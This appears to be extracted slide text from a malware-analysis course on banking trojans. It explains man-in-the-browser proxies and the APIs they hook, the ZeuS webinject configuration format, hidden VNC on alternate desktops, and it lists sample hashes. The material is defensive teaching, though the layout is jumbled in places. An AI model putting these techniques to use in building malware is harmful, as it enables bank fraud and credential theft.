Typical Goals of Malware and Their Implementations
Typical Goals of Malware and Their Implementations
Typical Goals of Malware and Their Implementations
https://github.com/hasherezade/malware_training_vol1
Dissecting a Banking Trojan
Banking Trojans - families
• Zbots – (a family of various forks of the ZeuS code)
• IcedID
• Tinba
• Gozi (and Gozi-based)
• Kronos
• TrickBot (some of the modules)
• ...and others
Elements of a Banking Trojan
• Classic banking trojans modify the content of selected websites (related to banking
transactions)
• Webinjects
• Webgrabbers
• An important element of a banking trojan is MITB proxy (Man-In-The-Browser)
• MITB proxy is a local proxy via which the traffic is bypassed and modified
• Sometimes to bypass the protections used by banks, the operator needs to remotely
access and use the victim machine (using Hidden VNC)
Elements of a Banking Trojan
Communicate
with the C2
server
Malicious implant
A process running malware core
Browser process
Elements of a Banking Trojan
• Malware can run its own Proxy server to which the browser will connect, whenever it
tries to connect with the target address
• The redirection is implemented by hooking the function responsible for establishing the
connection
• The traffic that bypassed by the malicious proxy is parsed, and may be augmented with
webinjects
Operation of a Banking Trojan
• Instead of connecting directly to the remote server, the browser connects to the local
proxy, run by the malware’s core module
infected
Operation of a Banking Trojan
• The requested page is first processed by the malicious proxy...
original
Operation of a Banking Trojan
• The proxy uses a special template to know where to implant the webinjects
• When the pattern is found, the malicious code is implanted
infected
MiTB Proxy - implementation
• Run a local proxy able to parse HTTP/HTTPS traffic
• Requires generating your own certificate
Ws2_32.connect
Nss32.SSL_AuthCertificateHook
Crypt32.CertGetCertificateChain
Crypt32.CertVerifyCertificateChainPolicy
Crypt32.CertGetCertificateChain
Crypt32.CertVerifyCertificateChainPolicy
Case-study time...
Webinjects – implementation
• The definitions of Webinjects following the ZeuS standard:
set_url https://* G P - run on POST request.
G - run on GET request.
L - if this symbol is specified, then the
data_before launch occurs as an HTTP grabber, if not
specified, then as an HTTP injection.
<title> H - complements the "L" character, saves
data_end content without HTML tag clipping. In normal
mode, all HTML tags are deleted, and some are
converted to the newline or space
data_after character.
I - compare the case-sensitive url parameter
</title> (for the English alphabet only).
data_end C - compare case insensitive (for the English
alphabet only).
B - block execution of the injection.
data_inject
INJECT
data_end
Webinjects – implementation
• The webinjects are installed following a configuration file, that is usually downloaded from
the C2 server
https://gist.github.com/hashereware/07b9c2a8624498030a942fccf277bbdb#file-webinjects1-txt-L80
Webinjects - implementation
• This is where the observed script came from...
Hidden VNC – the idea
• In order to perform some banking operations, the attackers need to use a VNC on the
victim machine
• In a normal case, the victim could see the attacker’s movements on their desktop
• In order to hide it, the attackers use the feature of alternative desktops
• this feature is well-known to Linux users, but not common – yet feasible - on Windows
• You can create an alternative Desktop on Windows, and switch some applications to be
displayed there
• Example: https://github.com/MalwareTech/CreateDesktop/
Hidden VNC – overwiew
Send screenshots
Create the Hidden Desktop Render a local view
Clicks, movements
Perform the actions on the Hidden Perform the actions on the local view
Desktop
Send screenshots
Get updated state Update the local view
HiddenVNC module The malware operator
Hidden VNC - rendering
• Windows renders only the elements for the currently active desktop – so, using the
alternative desktop simultaneously is not easy: requires manual implementation of the
rendering
• EnumDesktopWindows – get list of all Windows running on the Desktop
• PrintWindow – render the window to a bitmap
• messages: WM_PRINT, WM_PRINTCLIENT
• Some applications don’t handle those messages: so, the malware has to hook them, and
provide its own implementations
• It can be implemented i.e. by hooking user32.dll, or window subclassing
(SetWindowLong , SetWindowLongPtr)
Hidden VNC – user input
• The messages about the user input (keyboard, mouse, etc) will be send only the active
Desktop
• The Hidden VNC module has to implement emulation of a virtual keyboard and mouse
• It requires keeping track of every window on the Hidden Desktop, each locations, and on
which of them the mouse cursor is
• Sending PostMessage to the active window to emulate the user input
Hidden VNC – examples
• Many Banking trojans use Hidden VNC as a separate module
• IcedID („helpdesk” module)
• 2959091ac9e2a544407a2ecc60ba941b – helpdesk.dll
• Silent Night Zbot (hvnc32.dll/hvnc64.dll)
• 7ee0fd4e617d98748fbf07d54925dc12 – hvcn32.dll